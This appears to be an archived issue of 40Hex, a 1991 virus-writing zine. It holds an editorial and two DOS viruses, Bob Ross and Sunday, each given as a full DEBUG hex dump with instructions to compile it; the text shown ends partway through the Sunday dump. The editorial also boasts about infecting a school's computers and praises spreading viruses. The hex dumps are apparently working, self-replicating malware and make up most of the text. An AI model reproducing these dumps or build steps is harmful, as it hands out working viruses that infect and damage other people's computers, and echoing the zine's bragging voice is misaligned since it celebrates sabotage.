home
***
CD-ROM
|
disk
|
FTP
|
other
***
search
/
Collection of Hack-Phreak Scene Programs
/
cleanhpvac.zip
/
cleanhpvac
/
40HEXX.ZIP
/
40HEX004
< prev
next >
Wrap
Text File
|
1998-01-21
|
93KB
|
2,557 lines
40Hex Issue 4 December 1991
Index
-----
001.....................................................USA Virus News
002.................................................The Bob Ross virus
003...................................................The Sunday Virus
004...................................................The Terror Virus
005...............................................Virus Survay Artical
006.................................................The Typo COM virus
007.....................................................From Johns BBS
008.................................................The Marauder Virus
009................................................Pklite Scan Strings
010...............................................Encryption Defeating
011...............................................The Ultimate Toolkit
012..............................................Tequilla Virus Source
013...................................................................
014...................................................Is This The End?
Thanks to:
Shade of Sorrow, Demogorgon, Dark Angel, Count Zero,
Piff', Paragon Dude (and the rest of Phalcon), Blade Runner,
The Fisch, Instigator, Decimator, Dr. Logic, Venom/Hate (and
all the QSD/Lutz crowd), God, Amiga Factor, all the people
from the city, and all I forgot...
40Hex Issue 4 December 1991
Whats New
---------
Well a lot of things been going on this month. Well I've been
really lazy lately and haven't gotten around to writing this issue
for over two months I guess. Well let me tell you whats been going
on.
Let me take the time now to address these lame fucking people who,
if they had 9600+ modems, would be wares puppies, but being they
have a 2400 they decide to practice there leeching habits on
viruses. They are the virus collectors, they ones who never run
the damn things, just add them to there collection and upload them
here and there to be really, as they say, "K-K00\_." Please
mother fuckers, stop. I mean look at the Red Cross virus, does
anyone have the real copy of it? Some lame ass collector found
something that scanned as Red-X and was "/> a |)" enough to upload
it everywhere. Please, give it up. Virus BBS's are a great thing,
and without them we would be lost, but by the same tolken these
collectors, or as someone once said, "Micro-Wares Puppies," must
get with the program or die.
Well second of all, I've been calling The Homebase quite a bit
lately and came to one conclusion, people are dumb. Look in this
issue for some scroll backs of stupid things people have posted on
that BBS this month or so.
The Bob Ross virus has been released in the mist, so watch what you
D/L. Hmmmm, I think SCAN 85 caught it, but that will change soon,
right DA?
Funny story. I infected my schools computer with several viruses
before I transferred out. Well what I heard happened from that is
this. They somehow could not get the viruses to dissapper no
matter what they did. Incedently it was Whale and some other
viruses. Anyway, out of the fustration of the viruses reappering
all the time, they decided to out and get rid of all the hard
drives. So they removed all the hard drives from all the systems
and put them in storage. Anyway, they finally got a virus expert
to come it, he said that they didn't have to get rid of the hard
drives he can rid the viruses. Well to late. The art department
had got a hold of them and wealded them together into one big
statue! Thousands of dollars worth of hardware down they drain.
The school was so embarressed at the whole thing they shipped the
statue way out of state where so everybody would soon forget this
screwup. Thanks to Shade of Sorrow for finding that one out for
me.
SCAN 85 _is_ out, 'nuff said.
Bet you all heard the story about Novell and Stoned III? If not
this is the run down. Novell got infected by Stoned III. Novell
distributed infected copies of the December update to everyone.
That's the story.
40Hex Issue 4 December 1991
The Bob Ross Virus
This is the infamous Bob Ross virus by Dark Angel of Phalcon/Skism.
Here's a bit from the author first.
The Funky Bob Ross Virus Version 1.0
Written by Dark Angel / 26 September 1991 / (c) 1991
PHALCON/SKISM Co-op
Effective length: 1125, Resident length: 672 bytes
DEDICATION:
This virus was written expressedly to
1) Piss off Patty Hoffman, John McAffee, Ross Greenberg, and all the
other guru-wanna-bes in this world.
2) Spread the message of The Almighty Bob, and so enrichen the lives
of people all over the world.
3) Show off (Now I can tell people that I wrote a virus!)
WHAT THIS IS:
This is a self-encrypting, non-overwriting COM infector. It doesn't do
anything to EXE files. File sizes increase by 1117 bytes. It goes off
on July 9th of any year or after 7 infection "waves."
WHAT IT DOES WHEN IT GOES OFF:
The virus goes memory resident and prints out a Bobism every 5 minutes.
It then enters a delay loop for approximately 5 seconds, allowing for a
brief moment of silence while the victim reads Bob's holy message. The
virus will not destroy anything. The virus will not go TSR if it finds
another copy of itself in memory.
Well, here it is, the hex dump, by now you should know how to compile
it from the hex dump.
-------------------------------------------------------------------------------
n bob-ross.com
e 0100 FF 26 04 01 D0 08 C8 07 00 00 00 00 00 00 00 00
e 0110 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 0120 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 0130 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 0140 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 0150 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 0160 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 0170 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 0180 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 0190 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 01A0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 01B0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 01C0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 01D0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 01E0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 01F0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 0200 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 0210 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 0220 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 0230 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 0240 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 0250 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 0260 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 0270 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 0280 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 0290 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 02A0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 02B0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 02C0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 02D0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 02E0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 02F0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 0300 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 0310 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 0320 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 0330 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 0340 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 0350 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 0360 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 0370 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 0380 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 0390 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 03A0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 03B0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 03C0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 03D0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 03E0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 03F0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 0400 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 0410 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 0420 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 0430 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 0440 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 0450 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 0460 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 0470 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 0480 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 0490 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 04A0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 04B0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 04C0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 04D0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 04E0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 04F0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 0500 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 0510 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 0520 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 0530 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 0540 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 0550 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 0560 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 0570 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 0580 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 0590 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 05A0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 05B0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 05C0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 05D0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 05E0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 05F0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 0600 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 0610 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 0620 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 0630 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 0640 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 0650 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 0660 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 0670 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 0680 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 0690 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 06A0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 06B0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 06C0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 06D0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 06E0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 06F0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 0700 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 0710 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 0720 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 0730 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 0740 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 0750 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 0760 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 0770 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 0780 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 0790 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 07A0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 07B0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 07C0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 07D0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 07E0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 07F0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 0800 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 0810 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 0820 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 0830 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 0840 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 0850 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 0860 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 0870 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 0880 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 0890 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 08A0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 08B0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 08C0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 CD 20
e 08D0 FC E8 0A 00 BE D3 01 03 36 06 01 FF E6 B6 BE 15
e 08E0 01 03 36 06 01 8A 24 B9 23 04 83 C6 2D 90 8B FE
e 08F0 AC 32 C4 AA E2 FA C3 56 E8 E3 FF B9 5D 04 5A 83
e 0900 C2 B5 90 B4 40 CD 21 E8 D4 FF 75 5F 7D B1 B6 B6
e 0910 B6 B6 B6 B6 B6 B6 B6 B6 B6 B6 B6 B6 B6 B6 B6 B6
e 0920 B6 B6 B6 B6 B6 B6 B6 B6 B6 B6 B6 B6 B6 B6 B6 B6
e 0930 B6 B6 B6 B6 B6 B6 B6 B6 B6 B6 B6 B6 B6 B6 B6 B6
e 0940 B6 B6 B6 B6 B6 B6 B6 B6 B6 B6 B6 B6 B6 B6 B6 B6
e 0950 B6 B6 B6 B6 B6 B6 B6 B6 B6 B6 B6 B6 B6 B6 B6 EA
e 0960 B6 9C 98 D5 D9 DB B6 9C 98 9C B6 98 98 B6 B6 B6
e 0970 B6 B6 B6 B6 B6 B6 B6 B6 B6 B6 B6 B6 B6 B6 B6 B6
e 0980 B6 B6 B6 B6 B6 B6 B6 B6 B6 B6 B6 B6 B6 B6 B6 B6
e 0990 B6 B6 B6 B6 B6 B6 B6 B6 B6 B6 B6 37 70 C6 49 3D
e 09A0 48 35 71 BE 0F BE B6 45 12 02 F1 84 64 35 70 BC
e 09B0 7B 97 C4 9C 02 8D 3D 60 35 74 F4 7B 97 C4 A9 35
e 09C0 70 F6 48 B2 E0 35 70 B7 70 B2 B5 5E A9 B6 E8 36
e 09D0 8A B1 CB BB 02 9C 7B 97 37 4C BF B1 C2 B5 5F A0
e 09E0 B4 5F 11 B7 B6 B6 B6 B6 B6 B6 B6 B6 B6 E3 3D 5A
e 09F0 35 5A 9A E0 5D C6 26 02 AC 3B E0 62 7B 97 02 F8
e 0A00 0F A6 B6 0C 29 B7 B5 A0 B0 B7 7B 97 5D 90 36 C8
e 0A10 44 98 C2 A3 3B E0 44 02 8D 7B 97 C4 BA 08 10 B7
e 0A20 B5 80 B0 B7 49 B2 5E 72 49 3B E0 62 02 AC 7B 97
e 0A30 02 F9 7B 97 C5 6E 08 10 B7 B5 80 B0 B7 35 8A B6
e 0A40 C8 BB 49 BA 0C 15 B7 B5 A0 B0 B7 02 8D 7B 97 E8
e 0A50 3D 53 EB 75 5F 16 B7 08 10 B7 B5 80 B0 B7 71 B2
e 0A60 B6 B6 5D 5D 5D 27 02 AC 0C 1E B7 B5 A0 B0 B7 7B
e 0A70 97 02 F8 0F B1 B6 0C 2F B7 B5 A0 B0 B7 7B 97 C4
e 0A80 55 5D A4 26 08 20 B7 B5 80 B0 B7 48 BA C2 7E 02
e 0A90 F9 7B 97 C4 79 08 7A B7 B5 80 B0 B7 36 8A F2 C2
e 0AA0 58 0E B6 8B 3D 60 35 5C B0 7B 97 C4 54 25 02 89
e 0AB0 0F BE B6 0C F5 B7 B5 A0 B0 B7 E4 7B 97 E8 E0 1B
e 0AC0 8B 49 90 C3 A2 1B 8B B2 B7 C3 B8 E8 02 88 7B 97
e 0AD0 5D 0B E6 FE F7 FA F5 F9 F8 E8 35 70 CC 3D 48 35
e 0AE0 71 E9 12 13 13 13 35 CA 48 BE 26 CA 69 02 9A 7B
e 0AF0 97 B4 60 C2 4E 08 A3 B7 B5 80 B0 B7 3E A2 0E B7
e 0B00 F5 85 7F 3D 60 37 74 07 B6 7B 97 02 88 7B 97 0E
e 0B10 B4 8B 7B 97 C4 00 3D 4C 35 71 EB 1D 25 02 F6 0F
e 0B20 B2 B6 0C B6 B7 7B 97 02 F6 3D 41 35 70 4A 37 B2
e 0B30 B6 B7 0F B4 B6 3D 60 7B 97 3D B2 9B BE B7 37 70
e 0B40 84 49 E0 3F B2 02 F6 0F B4 B6 3D 60 7B 97 0E B4
e 0B50 F4 85 7F 85 64 7B 97 5E 2B 4B E8 37 70 66 B6 3D
e 0B60 AA 0E B7 E1 35 70 4C 3D BA 35 70 B4 3D A2 7B 97
e 0B70 02 88 7B 97 0E B7 F5 84 5B 35 70 4B 3C BA 3D 60
e 0B80 35 74 1C 7B 97 5F 4A 48 5D DB 26 B0 98 70 B0 B6
e 0B90 B7 B6 85 6D 3A 7E F5 38 75 8D 75 C2 B9 08 B6 B7
e 0BA0 3D 48 0F B2 B6 45 10 C3 5B 5D FD 26 B1 98 71 B0
e 0BB0 BE B7 16 A2 98 71 B0 A6 B7 B7 B6 08 E5 B2 B5 80
e 0BC0 B0 B7 09 A4 B7 0F A4 B7 45 12 0E BE 83 7B 97 98
e 0BD0 3F A8 B2 B7 98 3A B0 B0 B7 0E BE 93 0C A4 B7 7B
e 0BE0 97 B0 17 9A B6 38 76 02 FF 7B 97 B1 0E B6 87 0C
e 0BF0 9C B6 7B 97 7B 96 B1 02 8D 0C 21 B7 B5 A0 B0 B7
e 0C00 7B 97 02 8D 35 74 08 7B 97 3D 44 35 70 40 09 B6
e 0C10 B7 0F BE B6 45 12 09 B6 B7 49 51 E6 E5 E7 E4 E0
e 0C20 A8 B0 2A 98 49 B8 BE B7 C3 FB 98 71 B0 BE B7 26
e 0C30 B7 B8 A9 B8 B1 08 CD B7 98 3D B8 A6 B7 84 52 1A
e 0C40 B5 46 54 4D 1A 31 43 85 7F 3C 7E 0E B6 A5 0D C6
e 0C50 B6 85 64 7B A6 98 49 B0 A6 B7 98 35 88 A6 B7 B1
e 0C60 C3 B1 98 71 B0 A6 B7 B7 B6 0F 86 B6 E7 0F 49 49
e 0C70 54 48 EF 54 41 31 43 2B B1 A9 E8 EC EF ED EE 98
e 0C80 49 98 B2 B7 B6 B9 F4 D9 D4 96 E4 D9 C5 C5 96 DA
e 0C90 DF C0 D3 C5 97 A3 F4 D9 D4 96 E4 D9 C5 C5 96 DF
e 0CA0 C5 96 C1 D7 C2 D5 DE DF D8 D1 97 A0 FB D7 CF D4
e 0CB0 D3 96 DE D3 96 DA DF C0 D3 C5 96 DE D3 C4 D3 98
e 0CC0 98 98 AC E1 DE D7 C2 96 D7 96 DE D7 C6 C6 CF 96
e 0CD0 DA DF C2 C2 DA D3 96 D5 DA D9 C3 D2 97 90 FB D7
e 0CE0 CF D4 D3 96 DE D3 96 DE D7 C5 96 D7 96 D8 D3 DF
e 0CF0 D1 DE D4 D9 C3 C4 96 C4 DF D1 DE C2 96 DE D3 C4
e 0D00 D3 98 98 98 9E EF D9 C3 96 D5 D7 D8 96 DB D7 DD
e 0D10 D3 96 C3 C6 96 C5 C2 D9 C4 DF D3 C5 96 D7 C5 96
e 0D20 CF D9 C3 96 D1 D9 96 D7 DA D9 D8 D1 98 1A 1A 1A
rcx
C2D
w
q
--------------------------------------------------------------------------------
The virus itself is only 1125 bytes, this file is 3125 to account for an
infected file.
Scan 85 detects it as the [Beta] virus, but strain-b will be out soon.
40Hex Issue 4 December 1991
The Sunday Virus
According to Patty Hoffman, the Sunday virus is based on the
Jerusalem viruses, because the codes for both viruses are similar.
Sunday infects COM, EXE, and OVL files, when they are executed, and it
stays resident in memory. It was circulated around the Seattle,
Washington area in 1989, and is quite common. Sunday can be picked up
by almost every scanner out there. The SCAN ID code for this virus
is "CD 21 80 FC 04 75 10" in lines 01E0 and 01F0.
This version of Sunday doesn't seem to print any messages on
the screen, however, some versions do, every Sunday. This virus
spreads rapidly, and replicates quite well.
To create SUNDAY.COM, cut out the following code, and name the
resulting file sunday.txt. Then, use this command: DEBUG < SUNDAY.TXT
--DecimatoR
-------------------------------------------------------------------------------
n sunday.com
e 0100 E9 92 00 59 57 C8 F7 E1 EE E7 00 01 4C 1E 00 00
e 0110 00 02 00 AB 00 0C 13 16 17 C7 02 BF 05 3A 1E 63
e 0120 79 00 00 00 00 00 00 00 00 00 00 00 00 00 E8 06
e 0130 5F BD 1D 80 00 00 00 80 00 BD 1D 5C 00 BD 1D 6C
e 0140 00 BD 1D 00 0A 95 22 29 00 00 00 00 F0 02 00 4D
e 0150 5A 87 01 14 01 ED 05 80 01 23 0B FF FF 8C 20 C0
e 0160 06 89 19 C6 00 8C 20 1E 00 00 00 00 00 00 00 00
e 0170 05 00 20 00 29 15 01 79 00 02 10 00 C0 20 02 00
e 0180 54 61 28 99 43 4F 4D 4D 41 4E 44 2E 43 4F 4D 01
e 0190 00 00 00 00 00 FC 06 B8 00 00 8E C0 26 A1 84 00
e 01A0 07 3D 4C 02 75 10 B4 DD BF 00 01 BE C2 06 03 F7
e 01B0 2E 8B 4D 11 CD 21 8C C8 05 10 00 8E D0 BC C0 06
e 01C0 50 B8 C6 00 50 CB FC 06 2E 8C 06 31 00 2E 8C 06
e 01D0 39 00 2E 8C 06 3D 00 2E 8C 06 41 00 8C C0 05 10
e 01E0 00 2E 01 06 49 00 2E 01 06 45 00 B4 FF CD 21 80
e 01F0 FC 04 75 10 07 2E 8E 16 45 00 2E 8B 26 43 00 2E
e 0200 FF 2E 47 00 33 C0 8E C0 BB FC 03 26 8B 07 2E A3
e 0210 4B 00 26 8A 47 02 2E A2 4D 00 26 C7 07 F3 A5 26
e 0220 C6 47 02 CB 58 05 10 00 8E C0 0E 1F B9 C2 06 D1
e 0230 E9 33 F6 8B FE 06 B8 3E 01 50 FF 2E 59 06 8C C8
e 0240 8E D0 BC C0 06 33 C0 8E D8 2E A1 4B 00 89 07 2E
e 0250 A0 4D 00 88 47 02 8B DC B1 04 D3 EB 83 C3 20 83
e 0260 E3 F0 2E 89 1E 33 00 B4 4A 2E 8E 06 31 00 CD 21
e 0270 B8 21 35 CD 21 2E 89 1E 17 00 2E 8C 06 19 00 0E
e 0280 1F BA 4C 02 B8 21 25 CD 21 8E 06 31 00 26 8E 06
e 0290 2C 00 33 FF B9 FF 7F 32 C0 F2 AE 26 38 05 E0 F9
e 02A0 8B D7 83 C2 03 B8 00 4B 06 1F 0E 07 BB 35 00 1E
e 02B0 06 50 53 51 52 B4 0F CD 10 3C 07 74 07 2E C7 06
e 02C0 4A 02 00 B8 B8 08 35 CD 21 2E 89 1E 13 00 2E 8C
e 02D0 06 15 00 0E 1F C7 06 1F 00 E0 79 B8 08 25 BA 0A
e 02E0 02 CD 21 5A 59 5B 58 07 1F 9C 2E FF 1E 17 00 1E
e 02F0 07 B4 49 CD 21 B4 4D CD 21 B4 31 BA C2 06 B1 04
e 0300 D3 EA 83 C2 10 CD 21 32 C0 CF 2E 83 3E 1F 00 00
e 0310 75 22 1E 06 56 57 50 8D 36 3E 02 0E 1F A1 4A 02
e 0320 8E C0 BF 00 00 FC A5 A5 A5 A5 A5 A5 58 5F 5E 07
e 0330 1F EB 06 90 2E FF 0E 1F 00 2E FF 2E 13 00 48 F0
e 0340 61 F0 21 F0 48 F0 61 F0 21 F0 00 B8 9C 80 FC FF
e 0350 75 05 B8 00 04 9D CF 80 FC DD 74 0E 3D 00 4B 75
e 0360 03 EB 21 90 9D 2E FF 2E 17 00 58 58 B8 00 01 2E
e 0370 A3 0A 00 58 2E A3 0C 00 F3 A4 9D 2E A1 0F 00 2E
e 0380 FF 2E 0A 00 2E C7 06 70 00 FF FF 2E C7 06 8F 00
e 0390 00 00 2E 89 16 80 00 2E 8C 1E 82 00 50 53 51 52
e 03A0 56 57 1E 06 FC 8B FA 32 D2 80 7D 01 3A 75 05 8A
e 03B0 15 80 E2 1F B4 36 CD 21 3D FF FF 75 03 E9 0F 03
e 03C0 F7 E3 F7 E1 0B D2 75 05 3D C2 06 72 F0 2E 8B 16
e 03D0 80 00 1E 07 32 C0 B9 41 00 F2 AE 2E 8B 36 80 00
e 03E0 8A 04 0A C0 74 0E 3C 61 72 07 3C 7A 77 03 80 2C
e 03F0 20 46 EB EC 2E 89 36 57 06 B9 0B 00 2B F1 BF 84
e 0400 00 0E 07 B9 0B 00 F3 A6 75 03 E9 C2 02 2E C6 06
e 0410 56 06 00 90 2E 8B 36 57 06 8D 3E 55 06 4F 4E 26
e 0420 8A 05 34 BB 3C 00 74 0D 3A 04 74 F1 2E C6 06 56
e 0430 06 01 90 EB E8 2E 80 3E 56 06 00 74 16 4F 26 80
e 0440 3D FF 74 2B 47 2E 8B 36 57 06 2E C6 06 56 06 00
e 0450 90 EB CA 07 1F 5F 5E 5A 59 5B 58 33 C9 B8 01 43
e 0460 CD 21 B4 41 CD 21 B8 00 4B 9D 2E FF 2E 17 00 B8
e 0470 00 43 CD 21 72 05 2E 89 0E 72 00 72 25 32 C0 2E
e 0480 A2 4E 00 1E 07 8B FA B9 41 00 F2 AE 80 7D FE 4D
e 0490 74 0B 80 7D FE 6D 74 05 2E FE 06 4E 00 B8 00 3D
e 04A0 CD 21 72 7C 2E A3 70 00 8B D8 B8 02 42 B9 FF FF
e 04B0 BA FB FF CD 21 72 EB 05 05 00 2E A3 11 00 B9 05
e 04C0 00 BA 6B 00 8C C8 8E D8 8E C0 B4 3F CD 21 8B FA
e 04D0 BE 05 00 F3 A6 74 22 B0 00 B9 00 00 BA 00 00 B4
e 04E0 42 CD 21 8D 16 DD 05 B9 14 00 B4 3F CD 21 81 3E
e 04F0 EF 05 89 19 75 0A E9 91 01 B4 3E CD 21 E9 CF 01
e 0500 B8 24 35 CD 21 89 1E 1B 00 8C 06 1D 00 BA 07 02
e 0510 B8 24 25 CD 21 C5 16 80 00 33 C9 B8 01 43 CD 21
e 0520 72 3B 2E 8B 1E 70 00 B4 3E CD 21 2E C7 06 70 00
e 0530 FF FF B8 02 3D CD 21 72 24 2E A3 70 00 8C C8 8E
e 0540 D8 8E C0 8B 1E 70 00 B8 00 57 CD 21 89 16 74 00
e 0550 89 0E 76 00 B8 00 42 33 C9 8B D1 CD 21 72 3E 80
e 0560 3E 4E 00 00 74 04 EB 5B 90 90 BB 00 10 B4 48 CD
e 0570 21 73 0B B4 3E 8B 1E 70 00 CD 21 E9 51 01 FF 06
e 0580 8F 00 8E C0 33 F6 8B FE B9 C2 06 F3 A4 8B D7 8B
e 0590 0E 11 00 8B 1E 70 00 06 1F B4 3F CD 21 72 1F 03
e 05A0 F9 33 C9 8B D1 B8 00 42 CD 21 BE 05 00 B9 05 00
e 05B0 1E 0E 1F F3 A4 1F 8B CF 33 D2 B4 40 CD 21 72 0D
e 05C0 E9 C7 00 B9 1C 00 BA 4F 00 B4 3F CD 21 72 4A C7
e 05D0 06 61 00 89 19 A1 5D 00 A3 45 00 A1 5F 00 A3 43
e 05E0 00 A1 63 00 A3 47 00 A1 65 00 A3 49 00 A1 53 00
e 05F0 83 3E 51 00 00 74 01 48 F7 26 78 00 03 06 51 00
e 0600 83 D2 00 05 0F 00 83 D2 00 25 F0 FF A3 7C 00 89
e 0610 16 7E 00 05 C7 06 83 D2 00 72 3A F7 36 78 00 0B
e 0620 D2 74 01 40 A3 53 00 89 16 51 00 A1 7C 00 8B 16
e 0630 7E 00 F7 36 7A 00 2B 06 57 00 A3 65 00 C7 06 63
e 0640 00 C6 00 A3 5D 00 C7 06 5F 00 C0 06 33 C9 8B D1
e 0650 B8 00 42 CD 21 72 0A B9 1C 00 BA 4F 00 B4 40 CD
e 0660 21 72 11 3B C1 75 23 8B 16 7C 00 8B 0E 7E 00 B8
e 0670 00 42 CD 21 72 14 33 D2 B9 C2 06 B4 40 CD 21 B9
e 0680 05 00 8D 16 05 00 B4 40 CD 21 2E 83 3E 8F 00 00
e 0690 74 04 B4 49 CD 21 2E 83 3E 70 00 FF 74 31 2E 8B
e 06A0 1E 70 00 2E 8B 16 74 00 2E 8B 0E 76 00 B8 01 57
e 06B0 CD 21 B4 3E CD 21 0E 1F C5 16 80 00 2E 8B 0E 72
e 06C0 00 B8 01 43 CD 21 8D 16 1B 00 B8 24 25 CD 21 07
e 06D0 1F 5F 5E 5A 59 5B 58 9D 2E FF 2E 17 00 CD 20 BA
e 06E0 00 11 01 ED 05 80 01 23 0B FF FF 95 22 00 0A D5
e 06F0 44 00 00 00 00 00 00 00 00 00 00 FF BB F9 FA E8
e 0700 F2 F8 FA 95 FE E3 FE BB F8 EE E9 FE 95 FE E3 FE
e 0710 BB F7 F4 EF EE E8 95 F8 F4 F6 BB F8 EC F2 95 FE
e 0720 E3 FE BB FE EF F9 FA E8 F2 F8 95 FE E3 FE BB F9
e 0730 FA E8 F2 F8 FA 95 F8 F4 F6 BB 8A 89 88 95 FE E3
e 0740 FE BB FF F9 FA E8 FE 95 FE E3 FE BB F9 FA E8 F2
e 0750 F8 95 F8 F4 F6 BB 01 68 61 FC 03 00 00 00 00 00
e 0760 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 0770 00 00 00 00 00 00 00 00 8C 0D 01 00 20 1C C3 28
